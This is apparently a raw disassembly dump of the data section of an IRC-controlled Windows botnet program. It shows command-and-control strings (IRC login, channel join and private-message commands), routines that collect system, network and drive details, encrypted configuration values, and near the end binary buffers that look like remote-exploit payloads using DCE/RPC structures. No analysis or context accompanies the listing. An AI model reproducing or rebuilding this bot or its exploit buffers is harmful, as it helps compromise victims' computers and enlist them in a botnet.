dd 0BDB9F9BBh, 0C1D8B19Eh, 0D1D4968Dh, 0DFB7D5EDh, 8CB1FFA0h
dd 0D49DB099h, 0D5DB8395h, 0CA91C8F9h, 0E2F3A1A5h, 0D48FB0D5h
dd 2 dup(0)
dword_41903C dd 0D7999597h, 0CDAB97FCh, 0BAA7BEF9h, 0D2D9B296h, 8B8Dh
; DATA XREF: .packed:00418FD4�o
dd 0
dword_419054 dd 0DEC08986h, 0DAAF95F1h, 0E2F1A3E7h, 82D8B3D4h, 818380D3h
; DATA XREF: .packed:00418FD0�o
dd 93F9C8A9h, 0B6EAA0F0h, 0D7CFE1D6h, 0D38FCBDBh, 8BE3C2ACh
dd 0EABAA1A9h, 89C2B7C8h, 9FD2D5D7h, 0CDAF89F0h, 0FDBDFEB1h
dd 92AD9Eh, 0
dword_419098 dd 0DEC08986h, 0DAAF95F1h, 0B0B7FDE6h, 0DE84BA89h, 0D3999284h
; DATA XREF: .packed:00418FCC�o
dd 97F2h, 0
; ---------------------------------------------------------------------------
loc_4190B4: ; DATA XREF: .packed:off_418FC8�o
xchg al, [edi-604D2E3Dh]
mov al, ds:0B9F9AA91h
cld
cwde
mov al, ds:8887C385h
retn
; ---------------------------------------------------------------------------
db 9Fh
dd 0D9A195DAh, 0BC8AF5A4h, 0D095B994h, 0C3D9AF90h, 0D2A29BE9h
dd 0B6F0E2ADh, 0B083h, 0
dword_4190E8 dd 0DCD88996h, 90BC9BFFh, 0B4B1FFAFh, 0D2D9B097h, 8B8Dh
; DATA XREF: .packed:off_418FC4�o
dd 0
off_419100 dd offset loc_415353+2 ; DATA XREF: sub_408342+2C�o
dword_419104 dd 74737953h, 69206D65h, 726F666Eh, 6974616Dh, 2D206E6Fh
; DATA XREF: sub_4083AD+3CE�o
dd 3A534F20h, 6E695720h, 73776F64h, 34300320h, 3732502h
dd 25282002h, 76202C73h, 2343003h, 252E6425h, 2C020364h
dd 30036220h, 64250234h, 2E290203h, 55504320h, 7325203Ah
dd 34300320h, 3642502h, 7A484D02h, 6152202Eh, 3203A6Dh
dd 25023430h, 4D020364h, 30032F42h, 64250234h, 424D0203h
dd 65726620h, 49202E65h, 3A367650h, 34300320h, 3732502h
dd 55202E02h, 6D697470h, 3203A65h, 25023430h, 64020364h
dd 73257961h, 34300320h, 3642502h, 756F6802h, 20732572h
dd 2343003h, 2036425h, 756E696Dh, 73256574h, 6F43202Eh
dd 7475706Dh, 616E7265h, 203A656Dh, 2343003h, 2037325h
dd 7355202Eh, 203A7265h, 2343003h, 2037325h, 0A0D2Eh
dword_4191F4 dd 73h ; sub_4083AD:loc_4086E7�o ...
aProcessornames db 'ProcessorNameString',0 ; DATA XREF: sub_4083AD+2D2�o
aHardwareDescri db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
; DATA XREF: sub_4083AD+296�o
align 4
aNo db 'No',0 ; DATA XREF: sub_4083AD:loc_4085EB�o
; sub_408B30:loc_408CB4�o ...
align 10h
aYes db 'Yes',0 ; DATA XREF: sub_4083AD+232�o
; sub_408B30+178�o ...
a2003 db '2003',0 ; DATA XREF: sub_4083AD+1FF�o
align 4
aXp db 'XP',0 ; DATA XREF: sub_4083AD+1E1�o
align 10h
a2000 db '2000',0 ; DATA XREF: sub_4083AD+1C3�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_4083AD+1A5�o
align 4
a98 db '98',0 ; DATA XREF: sub_4083AD+187�o
align 10h
aNt db 'NT',0 ; DATA XREF: sub_4083AD+166�o
align 4
a95 db '95',0 ; DATA XREF: sub_4083AD+153�o
align 4
aNoSp db 'no SP',0 ; DATA XREF: sub_4083AD+12E�o
align 10h
a?: ; DATA XREF: sub_4083AD+124�o
unicode 0, <?>,0
aSysinfoThread db 'Sysinfo thread',0 ; DATA XREF: sub_4087C4+2B�o
align 4
dword_419284 dd 7774654Eh, 206B726Fh, 6F666E69h, 74616D72h, 206E6F69h
; DATA XREF: sub_408B30+2D4�o
dd 6F48202Dh, 203A7473h, 2343003h, 2037325h, 614E202Eh
dd 203A656Dh, 2343003h, 2037325h, 7954202Eh, 203A6570h
dd 2343003h, 2037325h, 5049202Eh, 203A3676h, 2343003h
dd 2037325h, 6946202Eh, 61776572h, 64656C6Ch, 3003203Ah
dd 73250234h, 202E0203h, 6574614Ch, 3A79636Eh, 34300320h
dd 3732502h, 25202C02h, 53202E75h, 64656570h, 3003203Ah
dd 30250234h, 366322Eh, 424B2B02h, 6365732Fh, 5249202Eh
dd 70552043h, 656D6974h, 3003203Ah, 64250234h, 61640203h
dd 20732579h, 2343003h, 2036425h, 72756F68h, 3207325h
dd 25023430h, 6D020364h, 74756E69h, 2E732565h, 0
aGood db 'Good',0 ; DATA XREF: sub_408B30+1F9�o
align 4
aAvarage db 'Avarage',0 ; DATA XREF: sub_408B30+1E3�o
aBad db 'Bad',0 ; DATA XREF: sub_408B30+1CD�o
aLan db 'LAN',0 ; DATA XREF: sub_408B30:loc_408C8F�o
aModem db 'Modem',0 ; DATA XREF: sub_408B30+14D�o
align 10h
aUnknown_0 db 'Unknown',0 ; DATA XREF: sub_408B30+F5�o
; sub_408B30+108�o
aNetinfoThread db 'Netinfo thread',0 ; DATA XREF: sub_408E4A+2B�o
align 4
dword_419398 dd 5C3A41h ; sub_408F2E+4E�r ...
dword_41939C dd 6F547325h, 206C6174h, 76697264h, 203A7365h, 2343003h
; DATA XREF: sub_408F2E+270�o
dd 2037525h, 6F54202Ch, 206C6174h, 63617073h, 3203A65h
dd 25023430h, 4D020375h, 72662042h, 2E6565h
dword_4193D4 dd 30037325h, 73250234h, 73250203h, 0dword_4193E4 dd 30037325h, 73250234h, 73250203h, 34300320h, 3752502h
; DATA XREF: sub_408F2E+1C5�o
dd 20424D02h, 65657266h, 0
dword_419404 dd 202Eh ; sub_408F2E+24A�o
aUnknown db 'unknown',0 ; DATA XREF: sub_408F2E:loc_40902D�o
; sub_4129CA+34�o
aRamdisk db 'ramdisk',0 ; DATA XREF: sub_408F2E+F6�o
aCdRom db 'cd-rom',0 ; DATA XREF: sub_408F2E+E4�o
align 10h
aRemote db 'remote',0 ; DATA XREF: sub_408F2E+D2�o
align 4
aFixed db 'fixed',0 ; DATA XREF: sub_408F2E+C0�o
align 10h
aRemovable db 'removable',0 ; DATA XREF: sub_408F2E+AE�o
align 4
aDriveInformati db 'Drive information - ',0 ; DATA XREF: sub_408F2E+2E�o
align 4
aDriveinfoThrea db 'Driveinfo thread',0 ; DATA XREF: sub_4091E2+2B�o
align 4
aThread db 'thread',0 ; DATA XREF: sub_4093B6+98�o
; sub_4094E6+93�o
align 10h
aBtg db 'btg',0 ; DATA XREF: sub_4093B6+93�o
dword_419474 dd 3430032Dh, 62656402h, 2036775haBtgTriedExecut db '- btg tried executing an unreadable address. (%08X)',0
aS db '*%s*',0 ; DATA XREF: sub_4097A7+81�o
; sub_4098F3+C4�o
align 4
dword_4194BC dd 2343003h, 2036925h, 7325202Eh, 0dword_4194CC dd 3430032Dh, 2037802haNoThreadsRunni db '- No threads running.',0
align 4
dword_4194EC dd 3430032Dh, 2037802h, 694C202Dh, 6E697473h, 30032067h
; DATA XREF: sub_409AD5+3A�o
dd 69250234h, 32F0203h, 25023430h, 20020369h, 65726874h
dd 3A736461h, 0
aCouldNotGetAVa db 'Could not get a valid ICMP handle',0Ah,0 ; DATA XREF: sub_409CB1+15�o
align 10h
dword_419540 dd 2343003h, 2036425h, 2020202Eh, 3 dup(2020202Ah), 6F727245h
; DATA XREF: sub_409DD0+3A3�o
dd 30033A72h, 64250234h, 203h
dword_419568 dd 2343003h, 2036425h, 6425202Eh, 2520736Dh, 20736D64h
; DATA XREF: sub_409DD0+37F�o
dd 736D6425h, 34300320h, 2E642502h, 252E6425h, 64252E64h
dd 203h
dword_419594 dd 2343003h, 2036425h, 6425202Eh, 2520736Dh, 20736D64h
; DATA XREF: sub_409DD0+32F�o
dd 736D6425h, 34300320h, 3732502h, 25282002h, 64252E64h
dd 2E64252Eh, 296425h
aCouldNotResolv db 'Could not resolve name',0 ; DATA XREF: sub_409DD0:loc_409F06�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_409DD0+80�o
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_409DD0+6A�o
align 4
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_409DD0:loc_409E24�o
align 4
aIcmp_dll db 'ICMP.DLL',0 ; DATA XREF: sub_409DD0+34�o
align 4
unk_419618 db 55h ; U ; DATA XREF: sub_40A1A7+C�o
db 73h, 61h, 67h
db 65h ; e
db 3Ah, 20h, 3
db 30h ; 0
db 34h, 2, 74h
db 72h ; r
db 61h, 63h, 65h
db 3
db 2, 20h, 3Ch
db 3
db 30h, 34h, 2
db 68h ; h
db 6Fh, 73h, 74h
db 3
db 2, 3Eh, 20h
aHopcountTimeou db '[<hopcount> <timeout> <pingcount>]',0
align 4
dword_41965C dd 202h dword_419660 dd 0A0D7325h, 0 dword_419668 dd 3334h dword_41966C dd 3430032Dh, 3752502h, 51202D02h, 79726575h, 20676E69h
; DATA XREF: sub_40A2D2+24�o
dd 2343003h, 2037325h, 726F6620h, 34300320h, 3732502h
dd 3A02h
dword_419698 dd 6F727245h, 75712072h, 69797265h, 320676Eh, 25023430h
; DATA XREF: sub_40A4A4+44�o
dd 2E020373h, 0
dword_4196B4 dd 72657551h, 676E6979h, 34300320h, 3732502h, 6F662002h
; DATA XREF: sub_40A50E+97�o
dd 30032072h, 73250234h, 203h
dword_4196D4 dd 0D9D88E95h, 0CCAFD4EEh, 0BDF0FEA1h, 0A19Eh, 0
; DATA XREF: sub_40A50E:loc_40A562�o
aAbcdef db 'abcdef',0 ; DATA XREF: sub_40A8AD+1B�o
align 10h
aUsername db 'username',0 ; DATA XREF: sub_40A9CF:loc_40C8EA�o
align 4
aId db 'id',0 ; DATA XREF: sub_40A9CF+1EF2�o
align 10h
dword_419700 dd 259B8h align 8
dword_419708 dd 69747055h, 2D20656Dh, 73795320h, 3A6D6574h, 34300320h
; DATA XREF: sub_40A9CF+1EB1�o
dd 3642502h, 79616402h, 3207325h, 25023430h, 68020364h
dd 2572756Fh, 30032073h, 64250234h, 696D0203h, 6574756Eh
dd 202E7325h, 3A435249h, 34300320h, 3642502h, 79616402h
dd 3207325h, 25023430h, 68020364h, 2572756Fh, 30032073h
dd 64250234h, 696D0203h, 6574756Eh, 7325h
dword_41977C dd 577ED30h dd 2 dup(0)
dword_419788 dd 5658h align 10h
dword_419790 dd 4827598h dd 2 dup(0)
a9252 db '9252',0 ; DATA XREF: sub_40A9CF+1BFA�o
align 4
dword_4197A4 dd 2DEB94F9h dd 3 dup(0)
dword_4197B4 dd 2E6BE5C8h align 10h
dword_4197C0 dd 2E5B8h align 8
dword_4197C8 dd 2495E5C8h dd 2 dup(0)
dword_4197D4 dd 24858h dd 0
dword_4197DC dd 21DFB0F8h dd 2 dup(0)
dword_4197E8 dd 6B6E696Ch, 30037620h, 64250234h, 32E0203h, 25023430h
; DATA XREF: sub_40A9CF+1B17�o
dd 3643330h, 20732502h, 6E69575Bh, 5D3233h
dword_41980C dd 26809888h dd 2 dup(0)
dword_419818 dd 266E8h align 10h
dword_419820 dd 65657053h, 3203A64h, 25023430h, 4B020375h, 65732F42h
; DATA XREF: sub_40A9CF+1AC8�o
dd 63h
dword_419838 dd 91DF38h dd 2 dup(0)
dword_419844 dd 2343003h, 2037325haHasNoIpv4End_ db ' has no ipv4 end.',0
align 10h
dword_419860 dd 20656854h, 34767069h, 646E6520h, 20666F20h, 2343003h
; DATA XREF: sub_40A9CF+1976�o
dd 2037325h, 20736920h, 2343003h, 252E6925h, 69252E69h
dd 369252Eh, 2
a2002 db '2002',0 ; DATA XREF: sub_40A9CF+1851�o
align 4
dword_419898 dd 42A40FB6h dd 3 dup(0)
dword_4198A8 dd 2343003h, 2037325h, 44202D20h, 203A534Eh, 2343003h
; DATA XREF: sub_40A9CF+17C1�o
dd 2037325h, 0
dword_4198C4 dd 151858h align 10h
dword_4198D0 dd 6F727245h, 65722072h, 766C6F73h, 20676E69h, 2343003h
; DATA XREF: sub_40A9CF+16F1�o
; sub_40A9CF+17EC�o
dd 2037325h, 2Eh
dword_4198EC dd 2343003h, 2037325h, 55202D20h, 6F6E6B6Eh, 74206E77h
; DATA XREF: sub_40A9CF+16AA�o
dd 20657079h, 2343003h, 2036425h, 64646120h, 73736572h
dd 3003203Ah, 73250234h, 203h
dword_419920 dd 2343003h, 2037325h, 49202D20h, 20367650h, 72646461h
; DATA XREF: sub_40A9CF+1659�o
dd 3A737365h, 34300320h, 3732502h, 2
dword_419944 dd 2343003h, 2037325h, 49202D20h, 20347650h, 72646461h
; DATA XREF: sub_40A9CF+1602�o
dd 3A737365h, 34300320h, 3732502h, 2
dword_419968 dd 3Ch ; sub_40A9CF:loc_40C011�o ...
dword_41996C dd 24858h dd 0
aQuitChangingSe db 'QUIT :changing server',0 ; DATA XREF: sub_40A9CF:loc_40BED3�o
align 4
dword_41998C dd 0B7DFB102h dd 3 dup(0)
dword_41999C dd 4B836E8h dd 2 dup(0)
dword_4199A8 dd 3E08h align 10h
dword_4199B0 dd 952EF8h dd 2 dup(0)
dword_4199BC dd 22F78h dd 0
dword_4199C4 dd 59D83703h dd 3 dup(0)
dword_4199D4 dd 72616843h, 65746361h, 6E692072h, 68202D20h, 203A7865h
; DATA XREF: sub_40A9CF+1431�o
dd 2343003h, 30257830h, 2035832h, 63656420h, 3003203Ah
dd 75250234h, 2E0203h
dword_419A04 dd 1197E8h align 10h
dword_419A10 dd 2AEC3778h dd 2 dup(0)
dword_419A1C dd 22DB0h dd 0
dword_419A24 dd 155E78h align 10h
dword_419A30 dd 135A78h dd 2 dup(0)
dword_419A3C dd 45444F4Dh, 732520hdword_419A44 dd 121930h align 10h
dword_419A50 dd 0D0EBFCFDh align 10h
aDebugModeIsS_ db 'Debug mode is %s.',0 ; DATA XREF: sub_40A9CF+129C�o
align 4
aOff db 'off',0 ; DATA XREF: sub_40A9CF:loc_40BC5B�o
aOn db 'on',0 ; DATA XREF: sub_40A9CF+1280�o
; sub_40A9CF:loc_40BC84�o
align 4
dword_419A7C dd 90F030h dd 2 dup(0)
dword_419A88 dd 29FB0h align 10h
dword_419A90 dd 58EE830h dd 2 dup(0)
dword_419A9C dd 25570h dd 0
dword_419AA4 dd 969E58h align 10h
dword_419AB0 dd 54524150h, 732520hdword_419AB8 dd 0FF778h dd 2 dup(0)
dword_419AC4 dd 0FB288h align 10h
dword_419AD0 dd 4E494F4Ah, 20732520h, 7325h ; sub_40A9CF+10FA�o ...
dword_419ADC dd 12A488h dd 2 dup(0)
aQuitSRemoved_ db 'QUIT :%s removed.',0 ; DATA XREF: sub_40A9CF+100A�o
align 4
dword_419AFC dd 55D1DB0h dd 2 dup(0)
dword_419B08 dd 85A058h dd 2 dup(0)
dword_419B14 dd 988A30h align 10h
dword_419B20 dd 53005939h align 10h
dword_419B30 dd 2AD87238h dd 2 dup(0)
dword_419B3C dd 903F4F39h dd 3 dup(0)
dword_419B4C dd 3F53B78h dd 2 dup(0)
dword_419B58 dd 1054F8h dd 2 dup(0)
dword_419B64 dd 74736F48h, 72646441h, 3003203Ah, 73250234h, 203h
; DATA XREF: sub_40A9CF+E77�o
dword_419B78 dd 2AC15529h dd 3 dup(0)
dword_419B88 dd 65736162h, 64203436h, 646F6365h, 203A6465h, 2343003h
; DATA XREF: sub_40A9CF+E2F�o
dd 2037325h, 0
dword_419BA4 dd 90DB78h align 10h
aItTookMeUms_ db 'It took me %ums.',0 ; DATA XREF: sub_40A9CF+DA9�o
align 4
dword_419BC4 dd 65736162h, 65203436h, 646F636Eh, 203A6465h, 2343003h
; DATA XREF: sub_40A9CF+D20�o
dd 2037325h, 0
dword_419BE0 dd 27B78h align 8
dword_419BE8 dd 0F669DEC8h dd 3 dup(0)
dword_419BF8 dd 51AF03CEh dd 4 dup(0)
dword_419C0C dd 560C8BD9h dd 3 dup(0)
dword_419C1C dd 125EC8h dd 2 dup(0)
dword_419C28 dd 23B2DEC8h dd 2 dup(0)
dword_419C34 dd 3E3DEC8h align 10h
dword_419C40 dd 2AC19078h dd 2 dup(0)
dword_419C4C dd 203A5049h, 2343003h, 2037325h, 0dword_419C5C dd 3D18h dd 0
dword_419C64 dd 25CB99D8h align 10h
dword_419C70 dd 26F91BF8h dd 2 dup(0)
dword_419C7C dd 26F7D4F8h dd 2 dup(0)
dword_419C88 dd 0BA3DCE82h dd 3 dup(0)
dword_419C98 dd 0BA3E0C3Ah dd 3 dup(0)
dword_419CA8 dd 27740A05h dd 3 dup(0)
dword_419CB8 dd 3F2F239h dd 3 dup(0)
dword_419CC8 dd 12E5F8h dd 2 dup(0)
dword_419CD4 dd 11709839h dd 3 dup(0)
dword_419CE4 dd 24EBDF78h align 10h
dword_419CF0 dd 1274D8h dd 2 dup(0)
dword_419CFC dd 119530h dd 2 dup(0)
dword_419D08 dd 5070h align 10h
aThisBuildIsBro db 'This build is broken and will not function properly.',0
; DATA XREF: sub_40A9CF:loc_40B1D8�o
align 4
aThisBuildIsFul db 'This build is fully functional',0 ; DATA XREF: sub_40A9CF+7FD�o
align 4
dword_419D68 dd 2343003h, 4B4F5242h, 2034E45h, 0dword_419D78 dd 2333003h, 2034B4Fh, 0dword_419D84 dd 9Ah, 0 dword_419D8C dd 95EFAFB7h, 0F78CDAE8h, 0F3ABB590h, 0EACDFBD5h, 90C4C3C2h
; DATA XREF: sub_40A9CF+790�o
dd 90E0C0C0h, 0FDADB5E8h, 2 dup(0)
dword_419DB0 dd 4CFC788h dd 2 dup(0)
dword_419DBC dd 225CC0D9h dd 3 dup(0)
dword_419DCC dd 16C4931h dd 3 dup(0)
dword_419DDC dd 0F6F3A5A0h, 0F584B2DAh, 818FC085h, 0E9A083AFh, 8484D4BBh
; DATA XREF: sub_40A9CF+534�o
dd 87F6CDABh, 2 dup(0)
dword_419DFC dd 0D9D08FA6h, 0EEA29BE9h, 0A6BAFFBAh, 0F5BEA198h, 2 dup(0)
; DATA XREF: sub_40A9CF+448�o
dword_419E14 dd 0E4F1A9B1h, 0FB9CBBCAh, 0B0B7DD94h, 0DE84BA89h, 0E7EB9284h
; DATA XREF: sub_40A9CF+437�o
dd 0D1AA94F4h, 9DFEE3BFh, 0C4B489AFh, 0DED29490h, 0CCABACE9h
dd 0BDB1F9BBh, 2 dup(0)
dword_419E48 dd 21CC8h align 10h
dword_419E50 dd 3F1EAF9h align 10h
dword_419E60 dd 3EDD4F9h align 10h
dword_419E70 dd 38323166h, 2B636E65h, 20626166h, 72636564h, 65747079h
; DATA XREF: sub_40A9CF+39C�o
dd 3203A64h, 25023430h, 20373h
dword_419E90 dd 242660F8h dd 2 dup(0)
dword_419E9C dd 38323166h, 2B636E65h, 20626166h, 72636E65h, 65747079h
; DATA XREF: sub_40A9CF+2A1�o
dd 3D203A64h, 2343003h, 2037325h, 0
dword_419EC0 dd 232320h dword_419EC4 dd 2B7260F8h align 10h
dword_419ED0 dd 8EB758h dd 2 dup(0)
dword_419EDC dd 72727543h, 20746E65h, 646E6977h, 203A776Fh, 2343003h
; DATA XREF: sub_40A9CF+139�o
dd 2037325h, 0
dword_419EF8 dd 473EDB0h dd 2 dup(0)
dword_419F04 dd 4B43494Eh, 732520h ; sub_40A9CF+EF�o ...
dword_419F0C dd 1685E8h dd 2 dup(0)
dword_419F18 dd 3C1A6B1h dd 3 dup(0)
aLinkLink@linkP db 'link!link@link PRIVMSG %s :%s',0 ; DATA XREF: sub_40C93C+88�o
; sub_40D871+85F�o
align 4
asc_419F48: ; DATA XREF: sub_40C93C+30�o
; sub_40C93C+B5�o
unicode 0, <;>,0
asc_419F4C db '<=',0 ; DATA XREF: sub_40CA29:loc_40CE59�o
align 10h
asc_419F50 db '>=',0 ; DATA XREF: sub_40CA29:loc_40CE07�o
align 4
asc_419F54: ; DATA XREF: sub_40CA29:loc_40CDDB�o
dw 3Eh
unicode 0, <>,0
asc_419F58 db '!=',0 ; DATA XREF: sub_40CA29:loc_40CDAF�o
align 4
asc_419F5C db '==',0 ; DATA XREF: sub_40CA29:loc_40CD83�o
align 10h
aIpv6 db '$ipv6',0 ; DATA XREF: sub_40CA29:loc_40CC43�o
; sub_40CA29:loc_40CD58�o
align 4
aFirewall db '$firewall',0 ; DATA XREF: sub_40CA29:loc_40CC1F�o
; sub_40CA29:loc_40CD34�o
align 4
aLatency db '$latency',0 ; DATA XREF: sub_40CA29:loc_40CBFB�o
; sub_40CA29:loc_40CD10�o
align 10h
aFree db '$free',0 ; DATA XREF: sub_40CA29:loc_40CBD7�o
; sub_40CA29:loc_40CCEC�o
align 4
aVersion db '$version',0 ; DATA XREF: sub_40CA29:loc_40CBB1�o
; sub_40CA29:loc_40CCC6�o
align 4
aUptime db '$uptime',0 ; DATA XREF: sub_40CA29+158�o
; sub_40CA29+26D�o
a32s16s32s db '%32s %16s %32s',0 ; DATA XREF: sub_40CA29+EE�o
align 4
asc_419FAC db '&&',0 ; DATA XREF: sub_40CA29+9D�o
; sub_40CA29+45D�o
align 10h
asc_419FB0: ; DATA XREF: sub_40CA29+28�o
unicode 0, <)>,0
aExecutingComma db 'Executing command(s): %s',0 ; DATA XREF: sub_40CEB0+5C�o
align 10h
a6667 db '6667',0 ; DATA XREF: sub_40CF2F:loc_40CF60�o
align 4
aCSCCUCUSCCC db '%c%s%c%c%u%c%u%s%c%c%c',0 ; DATA XREF: sub_40D043+27B�o
; sub_40D871+431�o
align 10h
aG: ; DATA XREF: sub_40D043+1DC�o
; sub_40D871+392�o
unicode 0, <G>,0
aA: ; DATA XREF: sub_40D043+1C6�o
; sub_40D871+37C�o
unicode 0, <A>,0
aB: ; DATA XREF: sub_40D043+1B0�o
; sub_40D871+366�o
unicode 0, <B>,0
aUnk db 'UNK',0 ; DATA XREF: sub_40D043+160�o
; sub_40D871+316�o
aUserSSSS db 'USER %s %s %s :%s',0 ; DATA XREF: sub_40D043+E2�o
align 4
aPassS db 'PASS %s',0 ; DATA XREF: sub_40D043+3F�o
aNoticeS db 'NOTICE %s :',0 ; DATA XREF: sub_40D420+10�o
; sub_40D53F+37�o
aPrivmsgS db 'PRIVMSG %s :',0 ; DATA XREF: sub_40D4AB+10�o
; sub_40D53F+AF�o
align 4
dword_41A038 dd 1 dword_41A03C dd 7373656Dh, 20656761h, 0dword_41A048 dd 49544F4Eh, 25204543h, 13A2073h, 0dword_41A058 dd 56495250h, 2047534Dh, 3A207325h, 1aMirc db 'mIRC',0 ; DATA XREF: sub_40D734+6�o
; sub_40D74D:loc_40D76E�o
align 10h
asc_41A070: ; DATA XREF: sub_40D871+CB7�o
unicode 0, <*>,0
aNotice db 'NOTICE',0 ; DATA XREF: sub_40D871:loc_40E1C0�o
; sub_40E618+89�o
align 4
asc_41A07C db '][',0 ; DATA XREF: sub_40D871+807�o
; sub_40D871+88C�o
align 10h
a332 db '332',0 ; DATA XREF: sub_40D871:loc_40DF8E�o
aNick db 'NICK',0 ; DATA XREF: sub_40D871:loc_40DF3E�o
align 4
a@: ; DATA XREF: sub_40D871:loc_40DEBE�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_40D871:loc_40DE96�o
; sub_40E618+33�o
a451 db '451',0 ; DATA XREF: sub_40D871:loc_40DE70�o
aUserhostS db 'USERHOST %s',0 ; DATA XREF: sub_40D871+5C4�o
; sub_40D871+5EE�o
aModeSXi db 'MODE %s +xi',0 ; DATA XREF: sub_40D871+571�o
a001 db '001',0 ; DATA XREF: sub_40D871:loc_40DD97�o
aModeSSmntu db 'MODE %s +smntu',0 ; DATA XREF: sub_40D871+515�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_40D871:loc_40DD25�o
align 4
aError db 'ERROR',0 ; DATA XREF: sub_40D871:loc_40DCFD�o
align 4
a433 db '433',0 ; DATA XREF: sub_40D871:loc_40DB2D�o
dword_41A0D8 dd 4950013Ah, 1474Ehdword_41A0E0 dd 4950013Ah, 474Ehdword_41A0E8 dd 52455601h, 4E4F4953h, 1732520h, 0aEggdropV1_6_16 db 'eggdrop v1.6.16',0 ; DATA XREF: sub_40D871:loc_40DAD1�o
dword_41A108 dd 52455601h, 4E4F4953h, 6E696C20h, 2576206Bh, 30252E64h
; DATA XREF: sub_40D871+24E�o
dd 73256433h, 69572820h, 2932336Eh, 1
dword_41A12C dd 4556013Ah, 4F495352h, 14Ehdword_41A138 dd 4556013Ah, 4F495352h, 4EhaSend db 'SEND',0 ; DATA XREF: sub_40D871+CD�o
align 4
dword_41A14C dd 4344013Ah, 43haPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_40D871:loc_40D8DD�o
; sub_40D871+901�o ...
aMode db 'MODE',0 ; DATA XREF: sub_40D871:loc_40D8C2�o
align 4
aPong db 'PONG',0 ; DATA XREF: sub_40D871:loc_40D8A7�o
align 4
aPongS db 'PONG %s',0 ; DATA XREF: sub_40D871+25�o
aPing db 'PING',0 ; DATA XREF: sub_40D871+A�o
align 4
aLinkLink@link db 'link!link@link',0 ; DATA XREF: sub_40E618:loc_40E7A5�o
align 4
byte_41A18C db 41h ; DATA XREF: sub_40E979+3C�r
; sub_40EB4E+24�r ...
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 10h
dword_41A1D0 dd 3430032Dh, 3732502h, 30032E02h, 73250234h, 202D0203h
; DATA XREF: sub_4129CA+5C�o
dd 202E7525h, 20776152h, 6E617274h, 72656673h, 206F7420h
dd 63207325h, 6C706D6Fh, 2E657465h, 0
dd 1130h, 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0F5h, 28h, 5Ch
dd 400DC28Fh, 5 dup(0)
dd 1, 0
dd 77777777h, 77777776h, 77777775h, 77F326C6h, 77F29267h
dd 77777772h, 77F9D463h, 750362C3h, 75035173h, 3 dup(717564B8h)
dd 71AB7BFBh, 773AD507h, 7C941EEDh, 77DB565Ch, 77FD1F89h
dd 2 dup(77E216B8h), 1130h, 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0F5h, 28h, 5Ch
dd 400DC28Fh, 5 dup(0)
dd 1, 0
dd 0FFCA8166h, 6A52420Fh, 2ECD5802h, 745A053Ch, 5E21B8EFh
dd 0FA8B4A9Dh, 0AFEA75AFh, 0E7FFE775h, 0
dd 2 dup(4A9D5E21h), 0
dd 77777777h, 77777776h, 77777775h, 77F326C6h, 77F29267h
dd 77777772h, 77F32836h, 750362C3h, 75035173h, 3 dup(7C2FA0F7h)
dd 2 dup(71AB7BFBh), 7C941EEDh, 77E216B8h, 77FD1F89h, 2 dup(77E216B8h)
dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
aFxnbfxfxnbfxfx:
unicode 0, <FXNBFXFXNBFXFXFXFX>,0
align 4
db 0CCh
db 0E0h, 0FDh, 7Fh
db 0CCh
db 0E0h, 0FDh, 7Fh
align 8
dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dd 20h, 0
dd 20h, 5C005Ch, 0
dd offset loc_43005A+2
a12345611111111:
unicode 0, <$\123456111111111111111.doc>,0
align 10h
dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0
